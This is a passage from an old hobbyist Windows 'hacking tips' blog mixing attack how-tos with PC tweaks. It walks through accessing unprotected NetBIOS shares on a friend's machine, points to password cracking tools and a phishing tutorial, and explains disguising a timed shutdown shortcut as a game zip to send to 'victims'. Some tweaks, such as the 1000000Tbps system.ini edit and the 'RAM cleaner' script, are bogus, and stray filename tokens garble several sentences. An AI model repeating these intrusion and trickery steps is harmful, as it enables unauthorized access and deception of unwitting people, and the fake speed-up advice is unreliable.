After it notifies you it’s done (if its able to find the password), this info will be saved to a .pot file in the run folder of JTR, so just open that to look what the password is after its done. Voila! You’ve just successfully used JTR, not too bad eh? I hope that helped anyone out there that was stuck on how to use JTR. It’s a little challenging the first time you 20nsy58omb6hjpuxmf3.png it and having to use command prompt.

I would also recommend you 20nsy58omb6hjpuxmf3.png Cain & Abel, which is another awesome program that can be used to crack hashes, including MD and sha hashes, and it has a very nice GUI (Graphical User Interface). It lets you have the option of using a dictionary attack (exactly what it sounds like, uses dictionary words and tries to match them), brute force attack (goes through every single possible combination), and plain text attack. You can 20nsy58omb6hjpuxmf3.png Cain and Abel from http://www.oxid.it/cain.html.

The only bad thing is that when you run a brute force attack, which is what you use most often, the program takes a very long time to match up rather long passwords; the jump from a 7 to 8 character password is huge. The best idea is just simply to program your own tool to do this, which would be much quicker than John the Ripper or Cain and Abel. Anyways, hope that helped, pm me if you have any questions


-------------------------------------------------------------------

***Increase ur youtube,metacafe buffering speed***

0 comments
ncrease ur youtube,metacafe buffering speed
wid this procedure
u can increase the buffering speed of uploaded vids
try it


steps

1.start
2.run
3.type--system.ini

after that ull get system notepad file as
; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON



jus below this copy
this-------------->
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps



so totally it will look as
; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=dosapp.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
page buffer=1000000Tbps
load=1000000Tbps
download=1000000Tbps
save=1000000Tbps
back=1000000Tbps
search=1000000Tbps
sound=1000000Tbps
webcam=1000000Tbps
voice=1000000Tbps
faxmodemfast=1000000Tbps
update=1000000Tbps


save the notepad file
nd reboot ur system


--------------------------------------------------------------------------------------

*** Hacking Tips and Tricks ***

0 comments
Big collection of all the old and new computer/network hacking tips and tricks...!

Detail Stepwise Description of each one...!

Check out the link below-

http://www.insecure.in/hacking_tips_tricks.asp



------------------------------------------------------------------------------------

*** NetBIOS attack ***

0 comments
So NetBIOS is the first thing when you want to root to learn. In my article i will considerate that my target don''t have password protected the files, shared files.

Tools:
Windows target and attacker(i don''t know if this attack work on Linux or other os)

First we need to choose a target we will consider our target to be a friend from the same LAN who own BOX666

Step 1:
open cmd
start->run->cmd->enter

Step 2:
Now we need to gather info about our target BOX666 to do this we will do a net view command

c:>net view

We do this to see all computers from our LAN

Without scanning the host for open ports we can see if our target is vulnerable to NetBIOS attack and have Printer and Files Sharing activate. We use the nbtstat command. but we need the ip address not the box name so we will ping our target

c:>ping BOX666

After the pinging process end we have our target ip let's say 1.1.1.1

Now we can use nbtstat command

c:>nbtstat -A 1.1.1.1

Now we get a list of some starnge data all what we are looking for is this:

<20>

This is a hex number who tell us that the BOX666 is vulnerable. Now we need to connect to target but if we connect what we can take. To gather information about shared files on BOX666 we use net view command

c:>net view 1.1.1.1

Now we have a list of shared files. Sometimes stupid users share a full partition or all partitions even the one where Windows is installed >:)

Step 3:
Now let''s connect using net use command

c:>net use x: \1.1.1.1shared_item

With this command we have created an network driver. To download data, upload data you can use cmd or windows explorer(recommended)

Step 4:
After you have done your job close the connection by using net use command

c:>net use x: /d

Now the network driver is gone

Congrats now you know how to do a NetBIOS Attack.


------------------------------------------------------------------------------

*** Video tut - Complete Phishing Tutorial ***

0 comments
Video - Complete Phishing Tutorial

[hide_me]http://www.mediafire.com/download.php?jwntnwzmmmk[/hide_me]

video tut by techboy




---------------------------------------------------------------------

***** Hacking videos *****

0 comments
This site has a ton of them, pretty useful

http://www.veryangrytoad.com



-----------------------------------------------------------------

***Restore Previously Open Folders After Shutdown***

0 comments
If you need to access lot of folders on your home computer or on the network regularly, then you can set them re-open automatically, when you will login, shutdown or restart your computer next time. There is no need to open regularly used folders manually, just configure the simple sitting, your computer will automatically reload all the previously opened windows.

By default windows XP disables this option to reload automatically all the previously opened windows, when you login on, shutdown or restart your computer.

Follow the given steps to configure your computer to reload previously opened folders automatically after shutdown.

* To edit this feature, you will need to be logged into your computer with administrative rights.
* First click on Start button then go to Control Panel.
* Open the “Appearance and Themes” option in control panel then click on Folder Options.
* A small windows dialog box will appear with the title “Folder options”, click on View tab.
* Under the Advanced setting section, scroll down to bottom and click the “Restore previous folder windows at logon” option and then click Ok button to save sitting.
* Now when you log off, restart or shutdown, your computer will automatically open the previously opened folders from the same location as before.


----------------------------------------------------------------

***Prevent Users From Writing to USB, One kind of registry hack!***

0 comments
If you have windows XP with SP2, then you can disable the writing option to USB drives. This trick is very useful if you have virus in your computer and want to copy files from a USB Drive but don’t want to transfer virus to the USB. Follow the given steps to disable the USB writing option:

To edit the computer registry, first you should log onto your computer with administrative rights.

First click on Start button and type “Regedit” in Run option.

Here locate the location to:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

Here in right side panel, click right to create a key with the name “StorageDevicePolicies”.

Now in left side panel, select “StorageDevicePolicies” key, again right click to create new DWORD value then label it “WriteProtect”. Set its value to “1″. But again to enable writing, set its values to “0″.

Now close the registry editor and restart your computer after any changes to go into effect.


----------------------------------------------------------------------

*** Shutdown someones PC over any messenger ***

0 comments
Ok this is a........ Well it's not really a virus of a hack because it doesn't damage anything. But that aside what it will do is shutdown the victim’s computer, this can be put in MSN convos so it is VERY fun to have, and it can also be put in emails and such like things.

1) Right click on desk top, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus"


You can change "this is a virus" to anything you would like that’s just the message that will appear.
The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

My advice would be to rename it something like.... wicked game. Depends on the victim’s age and sex. But make sure you call it something good or the victim won't bother clicking on it.
After you have given it a name click on finish.
You should now have an icon on your desktop that is called "wicked game" or whatever name you gave it.
It is also advised you change the icon to something different.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Don’t forget to add the .zip at the end.

WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.
Now feel free to send it to anyone you...... dislike greatly.

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it your self LOL
Ok go to start, run, type cmd, then in cmd type: shutdown -a


changing icon
http://www.windweaver.com/w95man4c.htm

------------------------------------------------------------------------------

*** Run Firefox inside Firefox ***

0 comments
you can run Firefox inside firefox just by typing following url.

How about Opening Firefox inside Firefox which is again in another Firefox..?
Not bad huh?
And its really easy too just type in this url in Firefox's address bar and there you go!
Firefox inside Firefox!

copy paste following url in a web browser (mozzila firefox).

chrome://browser/content/browser.xul


----------------------------------------------------------------------------

*** Fasten ur pc ***

0 comments
Speed Up By Clearing RAM
Open notepad type

FreeMem=Space(6400000)

& save it as ramcleaner.vbs & double click whenever ur pc appears slow



------------------------------------------------------------------------------------------

*** writing ur name in the taskbar ***

0 comments
i love this one..........

Follow the given steps to display the name in windows task bar:

To use this feature, you will need to be logged into your computer with administrative rights.

First click on windows Start button> Setting then click on Control Panel option.




Here double click on "Regional and Language Options" to edit the Regional default settings.





Now click on Customize button under the "Standard and formats" area, here a new dialog box

title will open with "Customize Regional Options".



Select "Time" tab on the "Customize Regional Options" dialog box.




Now go to "AM symbol" & "PM symbol" and type the name that you want to display in windows

task bar and click on Apply button to affect these settings.


--------------------------------------------------------------------------------------

*** Activate the keyboard mouse! ***

0 comments
Follow the given steps to activate the keyboard mouse:

To edit this feature, first you should log onto your computer with administrative rights.

To activate this feature, press Alt+Shift+NumLock keys at once and you will receive a small MouseKey box.

To keep MouseKeys on, click on Ok button or click on cancel button to cancel MouseKeys box.

Click on Settings button, if you want to adjust the mouse cursor detail settings.

Here a new dialog box will appear with the title Settings for MouseKeys", now you can manage all mouse settings for example mouse cursor speed, acceleration and some other features.

Now using Numeric keypad, you can move your mouse pointer. The controls are:
*
1,2,3,4,6,7,8 and 9 keys are used to move the mouse cursor into different directions.
*
Key 5 is used as mouse click button.
*
Insert key used to hold down mouse button.
*
+ Sign used to double click on any object.
*
Delete button used to release the mouse.
*
Click on NumLock button to disable this keyboard mouse feature.

Followers

Archive

 

╚►ITECHNOGURU™◄╝. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com